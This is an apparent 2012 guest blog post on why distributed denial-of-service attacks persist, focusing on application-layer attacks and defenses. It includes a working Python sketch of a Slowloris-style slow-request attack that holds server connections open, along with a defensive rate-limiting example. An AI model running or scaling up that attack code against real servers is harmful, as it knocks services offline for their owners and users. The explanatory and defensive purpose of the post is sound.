Why DDoS attacks persist

March 16th, 2012

Denial-of-service attacks made big news in 2011 as hacktivists refined techniques for rallying like-minded protesters to shut down targeted websites for ideological reasons. Sony, Visa, MasterCard, the U.S. Chamber of Commerce and many others got hit.

That trend has not abated. And now governments may be getting into the act, orchestrating such attacks. Earlier this week the BBC accused the Iranian government of disrupting the news organization’s e-mail and web pages, along with jamming the BBC’s satellite feeds into Iran.

In this LastWatchdog guest post, Lori MacVittie, Senior Technical Marketing Manager at application delivery networking firm F5, delves into the technical underpinnings of modern-day DDoS attacks.


By Lori MacVittie.

The success of distributed denial-of-service (DDoS) attacks today is more about what an attacker is trying to do with the traffic than about how much traffic they generate.

Certainly massive volumes of traffic can overwhelm a site in any number of ways, but such attacks are costly and require coordination to execute. It takes hundreds of thousands of machines to generate the kind of volume necessary to overwhelm the public-facing presence of an organization today. Network infrastructure has become adept not only at handling such volume but also at recognizing a traditional DDoS attack for what it is and putting the brakes on the traffic to protect a company’s presence.

This is why we’ve seen a rise in attacks directed at the application layers – exploits based on protocol behavior and on the basic application logic assumed by all web and application servers. These attacks offer maximum effect with minimal effort, requiring less coordination and fewer resources on the part of the attacker while still managing to disrupt services at even those organizations sitting one hop from the Internet backbone.
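To make this concrete, consider a slow-request attack in the Slowloris style, a well-known example of the class of protocol-behavior exploits described above. The Python sketch below shows the principle; the target host is a placeholder, and this is an illustration only (aiming it at a server you do not own is illegal). A single socket that never finishes its HTTP request can pin down a server worker indefinitely:

    import socket
    import time

    HOST = "example.com"  # placeholder target; illustration only

    # Open one TCP connection and start, but never finish, an HTTP request.
    sock = socket.create_connection((HOST, 80), timeout=10)
    sock.send(b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\n")

    # Dribble out one harmless header every few seconds. Because the blank
    # line that would end the request never arrives, the server keeps a
    # worker parked on this socket; a few thousand such sockets can exhaust
    # the connection pool with almost no bandwidth spent.
    for i in range(100):
        sock.send(b"X-Keep-Waiting: %d\r\n" % i)
        time.sleep(10)

    sock.close()

Note how little traffic this generates: a few bytes every ten seconds, from a handful of machines, versus the hundreds of thousands of machines needed for a volumetric flood.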

A week-long DDoS attack in early November, targeting an Asian e-commerce retailer, was one of the largest of 2011: it reached traffic volumes of 45 Gbps. Yet waves of other attacks that generated far less traffic have been far more successful at actually taking websites down.

Modern attacks

As noted in reports of the aforementioned attack, at its peak attackers were able to make 15,000 connections per second to the target company’s servers. This is the key to understanding modern attack methods. While network infrastructure can detect and throttle back traditional attacks, it is far less adept at detecting and throttling back modern attacks that target application protocols. That this company saw connections being made to its servers indicates that its network and application delivery infrastructure failed to correctly identify the attack and take appropriate measures to halt it.

This is likely for the same reason similar attacks have succeeded in the past: the network and security infrastructure in place is simply not imbued with the intelligence necessary to distinguish legitimate application requests from illegitimate ones. The key to doing so lies in understanding interaction behavior at the protocol layers and applying that understanding to live interactions in a way that clearly separates the two. When clients behave in ways inconsistent with the network and client characteristics present in every legitimate connection attempt, the infrastructure should raise an alarm and stand ready to clamp down once a certain threshold of traffic or requests is crossed.
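What that intelligence might look like in practice: a minimal Python sketch of the sliding-window threshold idea, where the window size, request ceiling, and function names are illustrative assumptions rather than any vendor’s actual implementation:

    import time
    from collections import defaultdict, deque

    WINDOW_SECONDS = 10
    MAX_REQUESTS_PER_WINDOW = 50  # assumed ceiling for a legitimate client

    # client IP -> timestamps of that client's recent requests
    request_log = defaultdict(deque)

    def is_suspicious(client_ip, now=None):
        """Record one request; report whether this client crossed the threshold."""
        now = time.time() if now is None else now
        window = request_log[client_ip]
        window.append(now)
        # Discard timestamps that have aged out of the sliding window.
        while window and now - window[0] > WINDOW_SECONDS:
            window.popleft()
        return len(window) > MAX_REQUESTS_PER_WINDOW

    # Called once per incoming request at the proxy or load-balancer tier:
    if is_suspicious("203.0.113.7"):
        print("throttle, challenge, or drop this client")

A real implementation would weigh more signals than raw request rate (header ordering, TLS characteristics, whether the client honors protocol timing), but the shape is the same: model what legitimate interaction looks like, and alarm on deviation.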

Because network infrastructure today is unable to accurately distinguish between bad and good requests, it can do little more than pass the requests to servers. Those servers, despite the ever-increasing computing resources available, are still simply unable to handle the volume of connections being attempted. The end result is almost always a disruption of service. In an auto-scaling cloud computing environment, service may continue – but at a very high cost, as automated systems launch more and more virtual servers to handle the load, each one incurring costs on an hourly basis.
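The arithmetic makes the point. Assuming illustrative figures (not any provider’s billed rates), a week of absorbing an attack through auto-scaling adds up quickly:

    # Back-of-the-envelope cost of "surviving" a DDoS via auto-scaling.
    # All figures are illustrative assumptions.
    instances_during_attack = 100   # VMs the autoscaler spins up under load
    hourly_rate = 0.50              # assumed cost per VM-hour, in USD
    attack_duration_hours = 24 * 7  # a week-long attack, as in the example above

    cost = instances_during_attack * hourly_rate * attack_duration_hours
    print(f"Estimated bill for staying up: ${cost:,.2f}")  # -> $8,400.00

The service stays up, but the attacker has converted a technical outage into a financial one.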

Traditional security mechanisms are excellent protection against traditional attacks. Sadly, however, they are largely ineffective against emerging modern ones. Organizations need to recognize attackers’ shift in focus from the network to the application layers and evaluate their strategy and infrastructure in light of how well those components would recognize and stop modern attacks.

About the essayist. Lori MacVittie is responsible for F5’s outbound marketing, education, and evangelism of application services. Her role includes authorship of technical materials and participation in a number of community-based forums and industry standards organizations, among other efforts.